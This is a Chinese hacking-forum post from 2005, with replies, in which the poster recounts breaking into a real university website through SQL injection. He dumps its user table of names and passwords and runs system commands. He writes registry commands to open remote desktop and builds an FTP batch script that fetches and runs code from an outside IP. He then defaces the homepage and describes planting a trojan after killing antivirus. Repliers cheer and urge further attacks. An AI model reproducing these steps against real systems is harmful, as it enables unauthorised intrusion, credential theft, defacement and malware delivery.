[原创][讨论]２００５年６月１３日无意中的入侵！

LBSALE[50]LBSALE[这个贴子最后由流浪的逍遥在 2005/09/06 10:26am 第 17 次编辑]

［严正声明］
1、任何人可以对本次入侵进行技术讨论，但禁止任何人进行恶意破坏！
2、若有朋友想与鄙人共同探讨，请加QQ348817165或鄙人开的QQ群！

今天老婆要考试，呵呵，逃课带她来办公室看书！
老婆云：去隔壁，别打扰我看书！#￥#￥，晕，去就去！
呵呵，忍不住打开了电脑，记得开电梯的阿姨叫我帮她找有关考护士执照的资料，她女儿马上要考试啦
！唉，看她那个急得哟，可怜天下父母心啊！！
在BAIDU一路搜索！还真找到几个！
最后不知怎么点的，点出了一个网站，瞟了眼地址栏，“news_id=876”，无意中输入了一个“';”
呵呵！返回：
500 Servlet Exception
java.lang.NullPointerException
at share.SelectBean.query(SelectBean.java:76)
at
_news._infoshow__jsp._jspService(C:\resin-2.1.6\doc\050418\news\infoshow.jsp:57)
at com.caucho.jsp.JavaPage.service(JavaPage.java:75)
at com.caucho.jsp.Page.subservice(Page.java:497)
at com.caucho.server.http.FilterChainPage.doFilter(FilterChainPage.java:182)
at com.caucho.server.http.Invocation.service(Invocation.java:312)
at com.caucho.server.http.CacheInvocation.service(CacheInvocation.java:135)
at com.caucho.server.http.HttpRequest.handleRequest(HttpRequest.java:244)
at com.caucho.server.http.HttpRequest.handleConnection(HttpRequest.java:163)
at com.caucho.server.TcpConnection.run(TcpConnection.java:137)
at java.lang.Thread.run(Thread.java:536)

--------------------------------------------------------------------------------
Resin 2.1.6 (built Fri Nov 8 08:18:18 PST 2002)
看都没看是JSP的页面，从来没有玩过注入，有点兴奋，拿出HDSI就开扫！
输入注入地址，选择“数字型”，其它不太懂默认！
扫出来结果是SQL的数据库，当前库为“db_exam1214”如图1！
http://szw.zmc.edu.cn/website/hfans/20050613/pic01.jpg
既然可以注入，就看看有什么数据库可利用！
点猜解表…………
不一会儿，结果出来啦，好像没什么敏感资料！只有个“tbl_user”觉得可疑！
图2
http://szw.zmc.edu.cn/website/hfans/20050613/pic02.jpg
选中该字段，继续猜解列…………
选中几个可疑的常规字段，再扫…………
出来一堆不知是什么东西的东西
图3
http://szw.zmc.edu.cn/website/hfans/20050613/pic03.jpg
初步分析，uid应该就是用户名，pass就是密码，name可能是发表的文章吧（后经验证是注册时填的姓
名，真该打，这个都不知道！）！
拿一个去登录一下，登录成功!
图4
http://szw.zmc.edu.cn/website/hfans/20050613/pic04.jpg
图5
http://szw.zmc.edu.cn/website/hfans/20050613/pic05.jpg
HDSI半天都没有扫完，不可能一直扫下去吧，看看有没有管理员帐户。
你问怎么找？晕哟，手动试噻！
点击注册，用户名填admin，其它随便，提交！
图６
http://szw.zmc.edu.cn/website/hfans/20050613/pic06.jpg
呵呵，就是这个啦！“用户名已存在，请更改后再注册”
http://szw.zmc.edu.cn/website/hfans/20050613/pic07.jpg
可是不知道密码啊，难道等他扫完！？晕！@@￥#￥
看看有没有后台，扫描软件不支持JSP后台扫描，只能自己找啦！
找发半天，全都404晕！这个网站难道没有后台？郁闷ing…………
看来只有从别的地方下手啦！
看看HDSI的高级命令，有没有什么东东可利用！
试着执行一个命令， net user guest
结果显示了guest的资料，呵呵！看来有搞头啦！
图8
http://szw.zmc.edu.cn/website/hfans/20050613/pic08.jpg
再来type c:\boot.ini，用的是2003
图9
http://szw.zmc.edu.cn/website/hfans/20050613/pic09.jpg
通过查看其硬盘与安装目录，发现他只有一个C盘，70G左右，没有装杀毒软件与防火墙，试试能不能上传文件
用winshell吧!把它做得像Telnet一样，不过是Te1net,呵呵！！惯用的伎俩啦！
结果又…………
图10
http://szw.zmc.edu.cn/website/hfans/20050613/pic10.jpg
再用这个工具开他的3389，结果连不上！
看看他的IP设置吧，看样子还是台网关服务器，接了两块网卡，但让我想不通的是这个
   Default Gateway . . . . . . . . . : 202.205.144.146
既然是网关，为什么还有网关啊！还请达人帮忙解释一下！
图11
http://szw.zmc.edu.cn/website/hfans/20050613/pic11.jpg
经过黑海众人的帮助，知道这个IP并不影响！在此表示感谢！
晕，看来是工具靠不住？
自己手动来吧，把下面的语句复制到里面去，一句一句执行吧！
[color=#990000]
echo Windows Registry Editor Version 5.00>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>c:\3389.reg
echo "fDenyTSConnections"=dword:00000000>>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>c:\3389.reg
echo "PortNumber"=dword:00000d3d>>c:\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>c:\3389.reg
echo "PortNumber"=dword:00000d3d>>c:\3389.reg
regedit /s 3389.reg
del 3389.reg

[color=#4D76B3]
在这里后来出现一个问题，2003的3389还要开远程协议才行，经过一番摸索，终于找出了控制远程协议开关的注册表项！（等一下帖出来！）

郁闷，入侵再次受阻，每次写到第三句的时候就会不停的执行，用type c:\3389.reg查看，发现
[color=#EE111]
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

不解中…………
2005年6有15日
看来此法行不通，试试以前利用UNICODE漏洞时用的方法~~~~！~！
写个批处理，从服务器上下木马！嘿嘿！
先不忙下马，先下个网页，本来准备直接ECHO的，但发现ECHO遇到“ " ”就挂掉，不知是怎么回事！加了“ ^ ”也不行！而下载的批处理中没有包含“ " ”之类的字符，经本机测试，以前代码可以直接从服务器上下载批处理，再运行后删除！
[color=#990000]
echo open 61.145.59.84 > c:\get.bat
echo netadmin >> c:\get.bat
echo netadmin >> c:\get.bat
echo get index.bat c:\index.bat >>c:\get.bat
echo bye >>c:\get.bat
ftp -s:c:\get.bat
del c:\get.bat
index.bat
del c:\index.bat ';本来这句应该可以执行的，但本地调试的时候却删不掉，算啦！手动删吧！

但没有写到两句，又出现上面的情况，第一句一句，第二句三句！晕，我得罪了谁啦！ :em35:
难道是 教主 搞的鬼，在HDSI里面动了手脚？？
监视一下不就知道啦！于是拿出了尘封已久的Winsock Expert，监视一下第二句ECHO的时候到底怎么啦！
结果显示出来是一堆UNICODE码！看不懂ing…………
还是厚着脸皮把那几行代码ECHO完吧！
在本地一测试，还行，就试试吧！
ftp -s:c:\get.bat
dir c:\
我差点没跳起来，哈哈，成功啦！
然后再  copy c:\index.htm C:\resin-2.1.6\doc\050418\index.htm
同志们，现在请进这个页面看看吧！（后来因为“唯一”兄的忠告，小弟还是低调一点，帖个图算啦！）
http://szw.zmc.edu.cn/website/hfans/20050613/pic12.jpg
已经是我的啦！不过你输入域名仍然能进原来的主页！
然后，用此法就可以，呵呵！下个马儿啦！
嗯，上面提到开3389的事！也可以做个批处理放到FTP里面，然后让他自己下载！这样就可以用图形界面控制啦！
等等，好像还有点工作还没有做完，清扫战场！看来不得不开3389啦！先把C盘下的index.bat、get.bat 删掉！
鉴于某些原因，本次渗透到此告一段落！
但3389的问题还得继续研究下去，以后肯定用得着！
让我们来看一下在XP下测试的结果！用注册表监视软件比较的结果！

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\fAllowToGetHelp
新: DWORD: 1 (0x1)
旧: DWORD: 0 (0)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\fDenyTSConnections
新: DWORD: 0 (0)
旧: DWORD: 1 (0x1)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch
新: DWORD: 476 (0x1dc)
旧: DWORD: 475 (0x1db)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List\3389:TCP
新: 字符串: "3389:TCP:*:Enabledxpsp2res.dll,-22009"
旧: 字符串: "3389:TCP:*:Disabledxpsp2res.dll,-22009"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP
新: 字符串: "3389:TCP:*:Enabledxpsp2res.dll,-22009"
旧: 字符串: "3389:TCP:*:Disabled:@xpsp2res.dll,-22009"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fAllowToGetHelp
新: DWORD: 1 (0x1)
旧: DWORD: 0 (0)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections
新: DWORD: 0 (0)
旧: DWORD: 1 (0x1)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch
新: DWORD: 476 (0x1dc)
旧: DWORD: 475 (0x1db)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List\3389:TCP
新: 字符串: "3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
旧: 字符串: "3389:TCP:*:Disabled:@xpsp2res.dll,-22009"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP
新: 字符串: "3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
旧: 字符串: "3389:TCP:*:Disabled:@xpsp2res.dll,-22009"

因我没有2003的系统，还请有2003的朋友试验一下，看看结果是否相同！
最后，因为技术问题，整个入侵过程显得有点乱！
但我一直没有破坏什么，最后给大家加强一下思想宣传教育！
看一下这些个帖子！
http://www.thysea.com/lb/cgi-bin/topic.cgi?forum=1&topic=4566&show=200
[转帖]一个不知名的黑客对新手的建议
http://www.thysea.com/lb/cgi-bin/topic.cgi?forum=1&topic=4258&show=375

哈哈。。黑了他。。。哈哈。（开玩笑的）

强悍,,楼主,请问你下一步怎么办,其实我也很想黑它的..可惜多次未果啊~~~

路过的 看了就要顶

这帖子不错，楼主蛮厉害，哈哈！~

顶`啊`顶啊`顶`

不错不错，希望大家也像楼主一样多写写实践心得！
尤其是蓝色阿！！！

不错不错！！支持原创，方法思路也挺好！呵呵

有些人也许有点疑问，楼主你怎么不直接用FTP下个网页，还下个批处理来生成网页，是不是脑袋有点...？
呵呵，对不起大家啦，这是我失误之处，本意是通过下载一个开3389的批处理！后来因放弃继续渗透，所以就下个网页生成批处理，其实只要能下载啦，后面的操作就很简单啦！
他有杀毒软件，我可以先让他下一个进程查看软件ps.exe ，可以查看进程名和PID，然后用该软件杀掉防毒软件的进程，再让他下载木马！
有马了之后干事就直接多啦，不用再受SQL的那份气啦！（什么东西，ECHO还要自动加两次！）不知道手动注入是不是这样的！有兴趣的朋友可以试试，试过后记得帖出来，大家长长经验！

好呀~！~！黑死他

那篇文章我在网友世界上看过哦哦！！！！！！！！